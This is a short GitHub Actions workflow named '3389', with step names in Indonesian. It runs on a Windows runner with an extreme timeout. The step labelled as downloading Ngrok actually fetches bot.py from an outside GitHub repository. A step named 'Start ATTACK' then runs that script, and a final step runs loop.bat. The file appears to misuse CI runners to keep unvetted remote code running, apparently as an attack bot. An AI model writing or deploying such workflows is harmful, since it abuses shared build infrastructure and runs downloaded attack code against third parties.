name: 3389

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999990

    steps:
    - name: Mendownload Ngrok.
      run: |
        Invoke-WebRequest https://github.com/SyzuTopia54y/3389/raw/main/bot.py -OutFile bot.py
    - name: Start ATTACK.
      run: Start-Process Powershell -ArgumentList '-Noexit -Command "python bot.py"'
    - name: Berhasil Dibuat! Anda Bisa Menutup Tab Sekarang.
      run: cmd /c loop.bat
